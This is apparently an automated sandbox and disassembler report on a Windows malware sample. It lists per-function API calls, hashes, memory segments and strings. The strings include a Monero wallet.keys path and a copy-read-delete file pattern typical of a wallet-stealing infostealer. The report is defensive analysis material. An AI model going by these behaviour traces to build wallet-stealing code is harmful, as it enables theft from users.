                          • Instruction Fuzzy Hash: 3D613270A10249DBDB14EFA4CCAAFEE7B75BF84344F008518F90A5F191EB746A49CB52
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • memset.MSVCRT ref: 0055716A
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
                          • sU, xrefs: 00557111
                          • sU, xrefs: 005572AE, 00557179, 0055717C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemset
                          • String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 4047604823-2944379081
                          • Opcode ID: a380d7f737c15f5b544a236192c5da77c12c2a714c0f559c92d6e9fe147f732a
                          • Instruction ID: 333499b0331cf4410ae5a3f2dfd7a565c0f087d1c4ffc189d71b099ab73b8786
                          • Opcode Fuzzy Hash: a380d7f737c15f5b544a236192c5da77c12c2a714c0f559c92d6e9fe147f732a
                          • Instruction Fuzzy Hash: 02517EB0C0420D9BDB14EB90DCA9BEEBB74BF58305F50419AE91577181EB742A8CCF54
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BD10,00000000,00020119,?), ref: 00557E5E
                          • RegQueryValueExA.ADVAPI32(?,0123E4A8,00000000,00000000,000000FF,000000FF), ref: 00557E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00557E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                          • Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
                          • Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                          • Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1
                          APIs
                          • StrStrA.SHLWAPI(0123F1E8,?,?,?,0055140C,?,0123F1E8,00000000), ref: 0055926C
                          • lstrcpyn.KERNEL32(0078AB88,0123F1E8,0123F1E8,?,0055140C,?,0123F1E8), ref: 00559290
                          • lstrlen.KERNEL32(?,?,0055140C,?,0123F1E8), ref: 005592A7
                          • wsprintfA.USER32 ref: 005592C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                          • Instruction ID: 500163c78d6353240f4ecee5eca953ff5661c5dbbb00720c7d4a87e4dac5f2b1
                          • Opcode Fuzzy Hash: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                          • Instruction Fuzzy Hash: D0011EB5540208FFDB04DFECC994EAE7BB9FB44351F108559F9098B204C639EA40DB95
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                          • RegCloseKey.ADVAPI32(?), ref: 005412FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                          • Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
                          • Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                          • Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00556663
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00556726
                          • ExitProcess.KERNEL32 ref: 00556755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                          • Instruction ID: 76d0334e3cb9ae8ef9df826022545192d81595670c63ba0d09d7774564a70188
                          • Opcode Fuzzy Hash: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                          • Instruction Fuzzy Hash: 82312FB1801219ABDB14EB50DCA5FDD7B78BF84301F40418AF61976191DF746B48CF6A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558836
                          • wsprintfA.USER32 ref: 00558850
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                          • Instruction ID: f27ffd1b6372606241725577f9286628833b3f6ade8cf7fff71a170a96260dd7
                          • Opcode Fuzzy Hash: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                          • Instruction Fuzzy Hash: 632103B1A40204BFEB04DFD4DD49FAEBBB8FB48711F20851AF605A7290D77D99018BA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                          • wsprintfW.USER32 ref: 00558D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                          • Instruction ID: 8931413a5d93e79e9bf228168f7fb1994a05517786c729212b24a77a023167f5
                          • Opcode Fuzzy Hash: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                          • Instruction Fuzzy Hash: FCE0E675A80208BBD710DB94DD09E5977B8EB44711F104155FE0997280D9755E109B66
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0054A6BC
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0054A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                          • Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
                          • Opcode Fuzzy Hash: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                          • Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D481
                          • lstrlen.KERNEL32(00000000), ref: 0054D698
                          • lstrlen.KERNEL32(00000000), ref: 0054D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0054D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                          • Instruction ID: bb55c24b0563f19868464467eb3b8617c289e58c8a48576a330db8ca67d68301
                          • Opcode Fuzzy Hash: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                          • Instruction Fuzzy Hash: 7E91F3729101199BDB04FBA4DC6ADEE7B38BF94301F50825AF90766091EF346A0DCB66
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
                          • lstrlen.KERNEL32(00000000), ref: 0054D99F
                          • lstrlen.KERNEL32(00000000), ref: 0054D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0054DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                          • Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
                          • Opcode Fuzzy Hash: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                          • Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
